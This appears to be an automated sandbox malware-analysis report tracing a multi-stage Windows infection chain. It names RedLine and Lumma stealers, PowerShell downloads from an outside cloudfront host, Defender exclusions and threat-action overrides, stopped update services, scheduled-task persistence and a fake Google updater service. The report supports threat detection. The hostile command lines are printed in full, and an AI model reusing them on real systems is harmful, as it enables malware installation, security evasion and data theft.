powershell.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeIncreaseQuotaPrivilege 8 WMIC.exe Token: SeSecurityPrivilege 8 WMIC.exe Token: SeTakeOwnershipPrivilege 8 WMIC.exe Token: SeLoadDriverPrivilege 8 WMIC.exe Token: SeSystemProfilePrivilege 8 WMIC.exe Token: SeSystemtimePrivilege 8 WMIC.exe Token: SeProfSingleProcessPrivilege 8 WMIC.exe Token: SeIncBasePriorityPrivilege 8 WMIC.exe Token: SeCreatePagefilePrivilege 8 WMIC.exe Token: SeBackupPrivilege 8 WMIC.exe Token: SeRestorePrivilege 8 WMIC.exe Token: SeShutdownPrivilege 8 WMIC.exe Token: SeDebugPrivilege 8 WMIC.exe Token: SeSystemEnvironmentPrivilege 8 WMIC.exe Token: SeRemoteShutdownPrivilege 8 WMIC.exe Token: SeUndockPrivilege 8 WMIC.exe Token: SeManageVolumePrivilege 8 WMIC.exe Token: 33 8 WMIC.exe Token: 34 8 WMIC.exe Token: 35 8 WMIC.exe Token: 36 8 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
151594.exei0.tmppid process 5720 151594.exe 5812 i0.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.execrypted333.exeinstall.execmd.exedescription pid process target process PID 3676 wrote to memory of 2384 3676 a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe explorku.exe PID 3676 wrote to memory of 2384 3676 a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe explorku.exe PID 3676 wrote to memory of 2384 3676 a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe explorku.exe PID 2384 wrote to memory of 2396 2384 explorku.exe explorku.exe PID 2384 wrote to memory of 2396 2384 explorku.exe explorku.exe PID 2384 wrote to memory of 2396 2384 explorku.exe explorku.exe PID 2384 wrote to memory of 3952 2384 explorku.exe amers.exe PID 2384 wrote to memory of 3952 2384 explorku.exe amers.exe PID 2384 wrote to memory of 3952 2384 explorku.exe amers.exe PID 3952 wrote to memory of 2544 3952 amers.exe axplons.exe PID 3952 wrote to memory of 2544 3952 amers.exe axplons.exe PID 3952 wrote to memory of 2544 3952 amers.exe axplons.exe PID 2384 wrote to memory of 3152 2384 explorku.exe 7b2f91b071.exe PID 2384 wrote to memory of 3152 2384 explorku.exe 7b2f91b071.exe PID 2384 wrote to memory of 3152 2384 explorku.exe 7b2f91b071.exe PID 2544 wrote to memory of 2112 2544 axplons.exe alex.exe PID 2544 wrote to memory of 2112 2544 axplons.exe alex.exe PID 2544 wrote to memory of 2112 2544 axplons.exe alex.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2112 wrote to memory of 2316 2112 alex.exe RegAsm.exe PID 2544 wrote to memory of 4912 2544 axplons.exe crypted333.exe PID 2544 wrote to memory of 4912 2544 axplons.exe crypted333.exe PID 2544 wrote to memory of 4912 2544 axplons.exe crypted333.exe PID 2316 wrote to memory of 4052 2316 RegAsm.exe One.exe PID 2316 wrote to memory of 4052 2316 RegAsm.exe One.exe PID 2316 wrote to memory of 5100 2316 RegAsm.exe svhoost.exe PID 2316 wrote to memory of 5100 2316 RegAsm.exe svhoost.exe PID 2316 wrote to memory of 5100 2316 RegAsm.exe svhoost.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 4912 wrote to memory of 5072 4912 crypted333.exe RegAsm.exe PID 2544 wrote to memory of 60 2544 axplons.exe redline1.exe PID 2544 wrote to memory of 60 2544 axplons.exe redline1.exe PID 2544 wrote to memory of 60 2544 axplons.exe redline1.exe PID 2544 wrote to memory of 2216 2544 axplons.exe install.exe PID 2544 wrote to memory of 2216 2544 axplons.exe install.exe PID 2544 wrote to memory of 2216 2544 axplons.exe install.exe PID 2216 wrote to memory of 404 2216 install.exe cmd.exe PID 2216 wrote to memory of 404 2216 install.exe cmd.exe PID 2216 wrote to memory of 404 2216 install.exe cmd.exe PID 404 wrote to memory of 396 404 cmd.exe Conhost.exe PID 404 wrote to memory of 396 404 cmd.exe Conhost.exe PID 404 wrote to memory of 396 404 cmd.exe Conhost.exe PID 404 wrote to memory of 1588 404 cmd.exe GameService.exe PID 404 wrote to memory of 1588 404 cmd.exe GameService.exe PID 404 wrote to memory of 1588 404 cmd.exe GameService.exe PID 404 wrote to memory of 1120 404 cmd.exe sc.exe PID 404 wrote to memory of 1120 404 cmd.exe sc.exe PID 404 wrote to memory of 1120 404 cmd.exe sc.exe PID 2544 wrote to memory of 4760 2544 axplons.exe swizzzz.exe PID 2544 wrote to memory of 4760 2544 axplons.exe swizzzz.exe PID 2544 wrote to memory of 4760 2544 axplons.exe swizzzz.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe"C:\Users\Admin\AppData\Local\Temp\a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052 -
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"7⤵PID:5300
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 38⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60 -
C:\Users\Admin\AppData\Local\Temp\pl.exe"C:\Users\Admin\AppData\Local\Temp\pl.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit7⤵PID:1588
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5424 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"8⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient7⤵
- Launches sc.exe
PID:396 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm7⤵
- Executes dropped EXE
PID:1588 -
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink7⤵
- Launches sc.exe
PID:1120 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm7⤵
- Executes dropped EXE
PID:3788 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"7⤵
- Executes dropped EXE
PID:2412 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink7⤵
- Executes dropped EXE
PID:3512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "6⤵PID:1668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:396
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC7⤵
- Launches sc.exe
PID:1404 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm7⤵
- Executes dropped EXE
PID:4692 -
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink7⤵
- Launches sc.exe
PID:3540 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm7⤵
- Executes dropped EXE
PID:1600 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"7⤵
- Executes dropped EXE
PID:1032 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink7⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "6⤵PID:6000
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks7⤵
- Launches sc.exe
PID:5544 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm7⤵
- Executes dropped EXE
PID:1220 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"7⤵
- Executes dropped EXE
PID:5152 -
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks7⤵
- Executes dropped EXE
PID:3952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "6⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2012 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:3784
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4604
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:2180 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F6⤵
- Creates scheduled task(s)
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\1000269001\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\1000269001\vpn-1002.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2508 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nseDDA0.tmp\abc.bat"7⤵PID:388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10008⤵
- Executes dropped EXE
PID:5304 -
C:\Users\Admin\AppData\Local\Temp\is-64ECS.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-64ECS.tmp\i0.tmp" /SL5="$F003A,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10009⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5812 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\grnqko > "C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\~execwithresult.txt""10⤵PID:5696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\grnqko11⤵
- Drops file in Program Files directory
PID:4696 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0x104,0xdc,0x7ffcba92ab58,0x7ffcba92ab68,0x7ffcba92ab7812⤵PID:2128
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\grnqko.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\~execwithresult.txt""10⤵PID:5420
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\rsqjgn > "C:\Users\Admin\AppData\Local\Temp\is-IM2FM.tmp\~execwithresult.txt""10⤵PID:4480
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Users\Admin\Pictures\hYchmv7XoywAmMadCtbrbOhc.exe"C:\Users\Admin\Pictures\hYchmv7XoywAmMadCtbrbOhc.exe" /s7⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5292 -
C:\Users\Admin\Pictures\ShFz0AYbnWgX4IsKjus61RWN.exe"C:\Users\Admin\Pictures\ShFz0AYbnWgX4IsKjus61RWN.exe"7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:1916 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1916 -s 11368⤵PID:5696
-
C:\Users\Admin\Pictures\R2T5vMWDwprMlVD4QWyCIOWu.exe"C:\Users\Admin\Pictures\R2T5vMWDwprMlVD4QWyCIOWu.exe"7⤵
- Executes dropped EXE
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\7zS2B70.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S8⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:5384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:3628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:5528
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:1668
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:4348
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:5784
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:5776
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:5612
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:1612
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:444
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:6052
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:5656
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:6056
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:2440
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:1372
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:6116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
PID:5392 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:2224
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:6088
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:4672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Suspicious use of AdjustPrivilegeToken
PID:8 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2B70.tmp\Install.exe\" it /DSzdidOKNS 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:5796 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:6032
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:1980
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:3196
-
C:\Users\Admin\Pictures\H0hAwii6pOOtrsKJ5CtraSSo.exe"C:\Users\Admin\Pictures\H0hAwii6pOOtrsKJ5CtraSSo.exe"7⤵
- Executes dropped EXE
PID:5488 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:3328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:5652
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:396
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc8⤵
- Launches sc.exe
PID:5308 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:5824 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv8⤵
- Launches sc.exe
PID:2440 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits8⤵
- Launches sc.exe
PID:832 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc8⤵
- Launches sc.exe
PID:1468 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵PID:6048
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵PID:6052
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵PID:5924
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵PID:6024
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"8⤵
- Launches sc.exe
PID:3736 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"8⤵
- Launches sc.exe
PID:6056 -
